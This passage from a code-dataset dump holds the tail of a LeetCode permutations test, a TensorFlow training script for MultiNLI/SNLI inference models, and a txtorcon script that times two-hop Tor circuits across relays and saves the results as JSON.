3],\n [3, 3, 3, 0]\n ], \"Additional 1\"\n\n print(\"All passed\")\n", "sub_path": "LeetCode/LC047_permutations_ii.py", "file_name": "LC047_permutations_ii.py", "file_ext": "py", "file_size_in_byte": 7609, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "itertools.permutations", 
"line_number": 22, "usage_type": "call"}, {"api_name": "itertools.permutations", "line_number": 36, "usage_type": "call"}, {"api_name": "math.factorial", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "118620988", "text": "\"\"\"\nTraining script to train a model on MultiNLI and, optionally, on SNLI data as well.\nThe \"alpha\" hyperparamaters set in paramaters.py determines if SNLI data is used in training. If alpha = 0, no SNLI data\nis used in training. If alpha > 0, then down-sampled SNLI data is used in training.\n\"\"\"\nimport os\nimport importlib\nimport pickle\n\nimport tensorflow as tf\nimport random\nfrom utils import logger\nimport utils.parameters as params\nfrom utils.data_processing import *\nfrom utils.evaluate import *\n\nFIXED_PARAMETERS = params.load_parameters()\nmodname = FIXED_PARAMETERS[\"model_name\"]\nlogpath = os.path.join(FIXED_PARAMETERS[\"log_path\"], modname) + \".log\"\nlogger = logger.Logger(logpath)\n\nmodel = FIXED_PARAMETERS[\"model_type\"]\n\nmodule = importlib.import_module(\".\".join(['models', model]))\nMyModel = getattr(module, 'MyModel')\n\n# Logging parameter settings at each launch of training script\n# This will help ensure nothing goes awry in reloading a model and we consistenyl use the same hyperparameter settings.\nlogger.log(\"FIXED_PARAMETERS\\n%s\" % FIXED_PARAMETERS)\n\nlogger.log(\"Loading data\")\ntraining_snli = load_nli_data(FIXED_PARAMETERS[\"training_snli\"], snli=True, udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.training_snli.cache')\ndev_snli = load_nli_data(FIXED_PARAMETERS[\"dev_snli\"], snli=True, udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.dev_snli.cache')\ntest_snli = load_nli_data(FIXED_PARAMETERS[\"test_snli\"], snli=True, udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.test_snli.cache')\n\ntraining_mnli = load_nli_data(FIXED_PARAMETERS[\"training_mnli\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.training_mnli.cache')\ndev_matched = load_nli_data(FIXED_PARAMETERS[\"dev_matched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.dev_matched.cache')\ndev_mismatched = load_nli_data(FIXED_PARAMETERS[\"dev_mismatched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.dev_mismatched.cache')\ntest_matched = load_nli_data(FIXED_PARAMETERS[\"test_matched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.test_matched.cache')\ntest_mismatched = load_nli_data(FIXED_PARAMETERS[\"test_mismatched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n 
cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.test_mismatched.cache')\n\nif 'temp.jsonl' in FIXED_PARAMETERS[\"test_matched\"]:\n # Removing temporary empty file that was created in parameters.py\n os.remove(FIXED_PARAMETERS[\"test_matched\"])\n logger.log(\"Created and removed empty file called temp.jsonl since test set is not available.\")\n\ndictpath = os.path.join(FIXED_PARAMETERS[\"log_path\"], modname) + \".p\"\n\nif not os.path.isfile(dictpath):\n logger.log(\"Building dictionary\")\n if FIXED_PARAMETERS[\"alpha\"] == 0:\n word_indices = build_dictionary([training_mnli])\n else:\n word_indices = build_dictionary([training_mnli, training_snli])\n\n logger.log(\"Padding and indexifying sentences\")\n sentences_to_padded_index_sequences(word_indices,\n [training_mnli, training_snli, dev_matched, dev_mismatched, dev_snli, test_snli,\n test_matched, test_mismatched])\n pickle.dump(word_indices, open(dictpath, \"wb\"))\n\nelse:\n logger.log(\"Loading dictionary from %s\" % dictpath)\n word_indices = pickle.load(open(dictpath, \"rb\"))\n logger.log(\"Padding and indexifying sentences\")\n sentences_to_padded_index_sequences(word_indices,\n [training_mnli, training_snli, dev_matched, dev_mismatched, dev_snli, test_snli,\n test_matched, test_mismatched])\n\nlogger.log(\"Loading embeddings\")\nloaded_embeddings = load_embedding_rand(FIXED_PARAMETERS[\"embedding_data_path\"], word_indices)\n\n\nclass ModelClassifier:\n def __init__(self):\n # Define hyperparameters\n self.model_type = FIXED_PARAMETERS[\"model_type\"]\n self.learning_rate = FIXED_PARAMETERS[\"learning_rate\"]\n self.display_epoch_freq = 1\n self.display_step_freq = 50\n self.batch_size = FIXED_PARAMETERS[\"batch_size\"]\n self.keep_rate = FIXED_PARAMETERS[\"keep_rate\"]\n self.alpha = FIXED_PARAMETERS[\"alpha\"]\n self.seq_length = FIXED_PARAMETERS['seq_length']\n self.udpipe_path = FIXED_PARAMETERS['udpipe_path']\n FIXED_PARAMETERS['embeddings'] = loaded_embeddings\n\n logger.log(\"Building model from %s.py\" % model)\n self.model = MyModel(**FIXED_PARAMETERS)\n\n # Perform gradient descent with Adam\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate, beta1=0.9, beta2=0.999).minimize(\n self.model.total_cost)\n\n # Boolean stating that training has not been completed,\n self.completed = False\n\n # tf things: initialize variables and create placeholder for session\n logger.log(\"Initializing variables\")\n self.init = tf.global_variables_initializer()\n self.sess = None\n self.saver = tf.train.Saver()\n\n def get_minibatch(self, dataset, start_index, end_index):\n indices = range(start_index, end_index)\n premise_vectors = np.vstack([dataset[i]['sentence1_binary_parse_index_sequence'] for i in indices])\n hypothesis_vectors = np.vstack([dataset[i]['sentence2_binary_parse_index_sequence'] for i in indices])\n genres = [dataset[i]['genre'] for i in indices]\n labels = [dataset[i]['label'] for i in indices]\n\n prem_dep = None\n hypo_dep = None\n\n if self.udpipe_path:\n prem_dep = np.stack([dataset[i]['prem_dep'] for i in indices])\n hypo_dep = np.stack([dataset[i]['hypo_dep'] for i in indices])\n\n return premise_vectors, hypothesis_vectors, labels, genres, prem_dep, hypo_dep\n\n def train(self, train_mnli, train_snli, dev_mat, dev_mismat, dev_snli):\n self.sess = tf.Session()\n self.sess.run(self.init)\n\n self.step = 0\n self.epoch = 0\n self.best_dev_mat = 0.\n self.best_mtrain_acc = 0.\n self.last_train_acc = [.001, .001, .001, .001, .001]\n self.best_step = 0\n\n # Restore most recent 
checkpoint if it exists.\n # Also restore values for best dev-set accuracy and best training-set accuracy\n ckpt_file = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt\"\n if os.path.isfile(ckpt_file + \".meta\"):\n if os.path.isfile(ckpt_file + \"_best.meta\"):\n self.saver.restore(self.sess, (ckpt_file + \"_best\"))\n self.best_dev_mat, dev_cost_mat = evaluate_classifier(self.classify, dev_mat, self.batch_size)\n best_dev_mismat, dev_cost_mismat = evaluate_classifier(self.classify, dev_mismat, self.batch_size)\n best_dev_snli, dev_cost_snli = evaluate_classifier(self.classify, dev_snli, self.batch_size)\n self.best_mtrain_acc, mtrain_cost = evaluate_classifier(self.classify, train_mnli[0:5000],\n self.batch_size)\n if self.alpha != 0.:\n self.best_strain_acc, strain_cost = evaluate_classifier(self.classify, train_snli[0:5000],\n self.batch_size)\n logger.log(\n \"Restored best matched-dev acc: %f\\nRestored best mismatched-dev acc: %f\\nRestored best \"\n \"SNLI-dev acc: %f\\nRestored best MulitNLI train acc: %f\\nRestored best SNLI train acc: %f\" %\n (self.best_dev_mat, best_dev_mismat, best_dev_snli, self.best_mtrain_acc, self.best_strain_acc))\n else:\n logger.log(\n \"Restored best matched-dev acc: %f\\nRestored best mismatched-dev acc: %f\\nRestored best \"\n \"SNLI-dev acc: %f\\nRestored best MulitNLI train acc: %f\" % ( \n self.best_dev_mat, best_dev_mismat, best_dev_snli, self.best_mtrain_acc))\n\n self.saver.restore(self.sess, ckpt_file)\n logger.log(\"Model restored from file: %s\" % ckpt_file)\n\n # Combine MultiNLI and SNLI data. Alpha has a default value of 0, if we want to use SNLI data, it must be\n # passed as an argument.\n beta = int(self.alpha * len(train_snli))\n\n # Training cycle\n logger.log(\"Training...\")\n logger.log(\"Model will use %s percent of SNLI data during training\" % (self.alpha * 100))\n\n while True:\n training_data = train_mnli + random.sample(train_snli, beta)\n random.shuffle(training_data)\n avg_cost = 0.\n total_batch = int(len(training_data) / self.batch_size)\n\n # Loop over all batches in epoch\n for i in range(total_batch):\n # Assemble a minibatch of the next B examples\n minibatch_premise_vectors, minibatch_hypothesis_vectors, minibatch_labels, minibatch_genres, \\\n minibatch_prem_dep, minibatch_hypo_dep = \\\n self.get_minibatch(training_data, self.batch_size * i, self.batch_size * (i + 1))\n\n # Run the optimizer to take a gradient step, and also fetch the value of the\n # cost function for logging\n feed_dict = {self.model.premise_x: minibatch_premise_vectors,\n self.model.hypothesis_x: minibatch_hypothesis_vectors,\n self.model.y: minibatch_labels,\n self.model.keep_rate_ph: self.keep_rate}\n\n if 'dep_avg' in self.model_type:\n feed_dict[self.model.prem_dep] = minibatch_prem_dep\n feed_dict[self.model.hypo_dep] = minibatch_hypo_dep\n\n _, c = self.sess.run([self.optimizer, self.model.total_cost], feed_dict)\n\n # Compute average loss\n avg_cost += c / (total_batch * self.batch_size)\n\n if self.step % self.display_step_freq == 0:\n logger.log(\"Epoch %i, step %i\\tAvg. 
train cost: %f\" % (\n self.epoch, self.step, avg_cost * total_batch / i))\n # if self.alpha != 0.:\n # strain_acc, strain_cost = evaluate_classifier(self.classify, train_snli[0:5000],\n # self.batch_size)\n # dev_acc_snli, dev_cost_snli = evaluate_classifier(self.classify, dev_snli, self.batch_size)\n # logger.log(\n # \"Epoch %i, step %i\\tDev-matched acc: %f\\tDev-mismatched acc: %f\\tDev-SNLI acc: %f\\t\"\n # \"MultiNLI train acc: %f\\tSNLI train acc: %f\" % (\n # self.step, dev_acc_mat, dev_acc_mismat, dev_acc_snli, mtrain_acc, strain_acc))\n # logger.log(\n # \"Epoch %i, step %i\\tDev-matched cost: %f\\tDev-mismatched cost: %f\\tDev-SNLI cost: %f\\t\"\n # \"MultiNLI train cost: %f\\tSNLI train cost: %f\" % (\n # self.step, dev_cost_mat, dev_cost_mismat, dev_cost_snli, mtrain_cost, strain_cost))\n # else:\n\n if self.step % 500 == 0:\n mtrain_acc, mtrain_cost = evaluate_classifier(self.classify, train_mnli[0:5000], self.batch_size)\n dev_acc_mat, dev_cost_mat = evaluate_classifier(self.classify, dev_mat, self.batch_size)\n dev_acc_mismat, dev_cost_mismat = evaluate_classifier(self.classify, dev_mismat, self.batch_size)\n\n logger.log(\"Epoch %i, step %i\\tMultiNLI train acc: %f\\tMultiNLI train cost: %f\" % (\n self.epoch, self.step, mtrain_acc, mtrain_cost))\n logger.log(\"Epoch %i, step %i\\tDev-matched acc: %f\\tDev-mismatched acc: %f\\tDev-matched cost: %f\"\n \"\\tDev-mismatched cost: %f\" % (self.epoch, self.step, dev_acc_mat,\n dev_acc_mismat, dev_cost_mat, dev_cost_mismat))\n\n self.saver.save(self.sess, ckpt_file)\n best_test = 100 * (1 - self.best_dev_mat / dev_acc_mat)\n if best_test > 0.04:\n self.saver.save(self.sess, ckpt_file + \"_best\")\n self.best_dev_mat = dev_acc_mat\n self.best_mtrain_acc = mtrain_acc\n # if self.alpha != 0.:\n # self.best_strain_acc = strain_acc\n self.best_step = self.step\n logger.log(\"==== Checkpointing with new best matched-dev accuracy: %f\" % self.best_dev_mat)\n\n self.step += 1\n\n # Display some statistics about the epoch\n if self.epoch % self.display_epoch_freq == 0:\n logger.log(\"======= Epoch: %i\\tAvg. 
Cost: %f\" % (self.epoch + 1, avg_cost))\n\n self.epoch += 1\n self.last_train_acc[(self.epoch % 5) - 1] = mtrain_acc\n\n # Early stopping\n progress = 1000 * (sum(self.last_train_acc) / (5 * min(self.last_train_acc)) - 1)\n\n if (progress < 0.1) or (self.step > self.best_step + 30000):\n logger.log(\"Best matched-dev accuracy: %s\" % self.best_dev_mat)\n logger.log(\"MultiNLI Train accuracy: %s\" % self.best_mtrain_acc)\n self.completed = True\n break\n\n def classify(self, examples):\n # This classifies a list of examples\n if test or self.completed:\n best_path = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt_best\"\n self.sess = tf.Session()\n self.sess.run(self.init)\n self.saver.restore(self.sess, best_path)\n logger.log(\"Model restored from file: %s\" % best_path)\n\n total_batch = int(len(examples) / self.batch_size)\n logits = np.empty(3)\n cost = 0\n genres = []\n for i in range(total_batch):\n minibatch_premise_vectors, minibatch_hypothesis_vectors, minibatch_labels, minibatch_genres, \\\n minibatch_prem_dep, minibatch_hypo_dep = \\\n self.get_minibatch(examples, self.batch_size * i, self.batch_size * (i + 1))\n feed_dict = {self.model.premise_x: minibatch_premise_vectors,\n self.model.hypothesis_x: minibatch_hypothesis_vectors,\n self.model.y: minibatch_labels,\n self.model.keep_rate_ph: 1.0}\n if 'dep_avg' in self.model_type:\n feed_dict[self.model.prem_dep] = minibatch_prem_dep\n feed_dict[self.model.hypo_dep] = minibatch_hypo_dep\n genres += minibatch_genres\n logit, cost = self.sess.run([self.model.logits, self.model.total_cost], feed_dict)\n logits = np.vstack([logits, logit])\n\n return genres, np.argmax(logits[1:], axis=1), cost\n\n def restore(self, best=True):\n if best:\n path = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt_best\"\n else:\n path = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt\"\n self.sess = tf.Session()\n self.sess.run(self.init)\n self.saver.restore(self.sess, path)\n logger.log(\"Model restored from file: %s\" % path)\n\n\nclassifier = ModelClassifier()\n\n\"\"\"\nEither train the model and then run it on the test-sets or\nload the best checkpoint and get accuracy on the test set. 
Default setting is to train the model.\n\"\"\"\n\ntest = params.train_or_test()\n\n# While test-set isn't released, use dev-sets for testing\ntest_matched = dev_matched\ntest_mismatched = dev_mismatched\n\nif not test:\n classifier.train(training_mnli, training_snli, dev_matched, dev_mismatched, dev_snli)\n logger.log(\"Acc on matched multiNLI dev-set: %s\" %\n (evaluate_classifier(classifier.classify, test_matched, FIXED_PARAMETERS[\"batch_size\"]))[0])\n logger.log(\"Acc on mismatched multiNLI dev-set: %s\" %\n (evaluate_classifier(classifier.classify, test_mismatched, FIXED_PARAMETERS[\"batch_size\"]))[0])\n logger.log(\"Acc on SNLI test-set: %s\" %\n (evaluate_classifier(classifier.classify, test_snli, FIXED_PARAMETERS[\"batch_size\"]))[0])\nelse:\n results = evaluate_final(classifier.restore, classifier.classify, [test_matched, test_mismatched, test_snli],\n FIXED_PARAMETERS[\"batch_size\"])\n logger.log(\"Acc on multiNLI matched dev-set: %s\" % (results[0]))\n logger.log(\"Acc on multiNLI mismatched dev-set: %s\" % (results[1]))\n logger.log(\"Acc on SNLI test set: %s\" % (results[2]))\n\n # Results by genre,\n logger.log(\"Acc on matched genre dev-sets: %s\" % (\n evaluate_classifier_genre(classifier.classify, test_matched, FIXED_PARAMETERS[\"batch_size\"])[0]))\n logger.log(\"Acc on mismatched genres dev-sets: %s\" % (\n evaluate_classifier_genre(classifier.classify, test_mismatched, FIXED_PARAMETERS[\"batch_size\"])[0]))\n", "sub_path": "train_mnli.py", "file_name": "train_mnli.py", "file_ext": "py", "file_size_in_byte": 18572, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.parameters.load_parameters", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.parameters", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "utils.logger", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.logger.Logger", "line_number": 20, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 61, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "utils.logger.log", "line_number": 66, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 72, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 79, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 81, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 86, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 104, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 104, "usage_type": "name"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 108, "usage_type": "attribute"}, {"api_name": "utils.logger.log", "line_number": 115, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 118, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "utils.logger.log", "line_number": 161, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 161, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 166, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 166, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 172, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 179, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 180, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 180, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 183, "usage_type": "call"}, {"api_name": "random.shuffle", 
"line_number": 184, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 212, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 212, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 233, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 233, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 235, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 248, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 248, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 254, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 254, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 263, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 263, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 264, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 264, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 271, "usage_type": "call"}, {"api_name": "os.path", "line_number": 271, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 275, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 275, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path", "line_number": 300, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path", "line_number": 302, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 303, "usage_type": "call"}, {"api_name": "utils.logger.log", "line_number": 306, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.parameters.train_or_test", "line_number": 316, "usage_type": "call"}, {"api_name": "utils.parameters", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 324, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 324, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 326, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 326, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 328, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 328, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 333, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 334, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 334, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 335, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 335, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 338, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 338, "usage_type": "name"}, {"api_name": "utils.logger.log", "line_number": 340, "usage_type": "call"}, {"api_name": "utils.logger", "line_number": 340, "usage_type": "name"}]} +{"seq_id": "635138384", "text": "import asyncio\nimport datetime\nimport json\nimport os\nimport time\nimport txtorcon\nimport urllib.request\n\nfrom twisted.internet import asyncioreactor\nfrom twisted.internet.defer import 
ensureDeferred, Deferred\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nfrom twisted.internet.task import react\nfrom twisted.web.client import readBody\n\ndef write_json(filestem, data):\n now = datetime.datetime.now().strftime(\"%Y%m%d_%H%M\");\n print(data)\n jsonStr = json.dumps(data)\n with open(filestem + \"_\" + now + \".json\", \"w\") as f:\n f.write(jsonStr)\n with open(filestem + \"_latest.json\", \"w\") as f:\n f.write(jsonStr)\n\ndef relay_data(exits):\n url = \"https://onionoo.torproject.org/details?type=relay&fields=nickname,fingerprint,as_name,country_name,contact,platform,or_addresses,bandwidth_rate,exit_probability\"\n if exits:\n url += \"&flag=exit\"\n req = urllib.request.Request(url)\n response = urllib.request.urlopen(req).read()\n data = json.loads(response.decode('utf-8'))\n return data[\"relays\"]\n\nasync def launch_tor(reactor):\n control_ep = TCP4ClientEndpoint(reactor, \"localhost\", 9051)\n tor = await txtorcon.connect(reactor, control_ep, password_function = lambda: \"bilboBaggins789\")\n #tor = await txtorcon.launch(reactor, progress_updates=print, data_directory=\"./tor_data\")\n config = await tor.get_config()\n state = await tor.create_state()\n socks = await config.create_socks_endpoint(reactor, \"9050\")\n print(\"Connected to tor {}\".format(tor.version))\n return [tor, config, state, socks]\n\nasync def time_two_hop(reactor, state, socks, guard, exit_node):\n circuit = await state.build_circuit(routers = [guard, exit_node], using_guards = False)\n #circuit = await state.build_circuit(routers = [exit_node], using_guards = False)\n await circuit.when_built()\n # print(\"Circuit\", circuit.id, circuit.path)\n t_start = time.time()\n agent = circuit.web_agent(reactor, socks)\n resp = await agent.request(b'HEAD', b\"http://example.com\")\n t_stop = time.time()\n return t_stop - t_start\n\ndef record_result(results, fingerprint, address, result, delta):\n if address not in results:\n results[address] = {}\n if fingerprint not in results[address]:\n results[address][fingerprint] = []\n dateString = str(datetime.datetime.now())\n results[address][fingerprint].append((result, dateString, delta))\n\nasync def test_exits(reactor, state, socks, guard, exits, repeats):\n exit_results = {}\n n = len(exits)\n for i in range(repeats):\n j = 0\n for exit_node in exits:\n j = j + 1\n result = \"\"\n delta = -1\n try:\n delta = await time_two_hop(reactor, state, socks, guard, exit_node)\n result = \"SUCCEEDED\"\n except Exception as err:\n result = str(err)\n record_result(exit_results, exit_node.id_hex, \"example.com\", result, delta)\n print('%d/%d: %d/%d' % (i+1, repeats, j, n), exit_node.id_hex, \":\", exit_results[\"example.com\"][exit_node.id_hex])\n return exit_results\n\nasync def test_relays(reactor, state, socks, relays, exit_node, repeats):\n relay_results = {}\n n = len(relays)\n for i in range(repeats):\n j = 0\n for relay in relays:\n j = j + 1\n result = \"\"\n delta = -1\n try:\n delta = await time_two_hop(reactor, state, socks, relay, exit_node)\n result = \"SUCCEEDED\"\n except Exception as err:\n result = str(err)\n record_result(relay_results, relay.id_hex, \"example.com\", result, delta)\n print('%d/%d: %d/%d' % (i+1, repeats, j, n), relay.id_hex, \":\", relay_results[\"example.com\"][relay.id_hex])\n return relay_results\n\nasync def _main(reactor):\n [tor, config, state, socks] = await launch_tor(reactor)\n config.CircuitBuildTimeout = 10\n config.SocksTimeout = 10\n config.CircuitStreamTimeout = 10\n config.save()\n routers = 
state.all_routers\n\n guard1 = state.routers_by_hash[\"$F6740DEABFD5F62612FA025A5079EA72846B1F67\"]\n exits = list(filter(lambda router: \"exit\" in router.flags, routers))\n exit_results = await test_exits(reactor, state, socks, guard1, exits, 10)\n exit_results[\"_relays\"] = relay_data(True)\n write_json(\"../all_exit_results/exit_results\", exit_results)\n\n exit_node = state.routers_by_hash[\"$1AE949967F82BBE7534A3D6BA77A7EBE1CED4369\"]\n relays = list(filter(lambda router: \"exit\" not in router.flags, routers))\n relay_results = await test_relays(reactor, state, socks, relays, exit_node, 3)\n relay_results[\"_relays\"] = relay_data(False)\n write_json(\"../all_relay_results/relay_results\", relay_results)\n\ndef main():\n return react(\n lambda reactor: ensureDeferred(\n _main(reactor)\n )\n )\n\nif __name__ == '__main__':\n main()\n", "sub_path": "relay_perf.py", "file_name": "relay_perf.py", "file_ext": "py", "file_size_in_byte": 4906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 18, "usage_type": "call"}, {"api_name": "urllib.request.request.Request", "line_number": 28, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 28, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 28, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 29, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 29, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 30, "usage_type": "call"}, {"api_name": "twisted.internet.endpoints.TCP4ClientEndpoint", "line_number": 34, "usage_type": "call"}, {"api_name": "txtorcon.connect", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 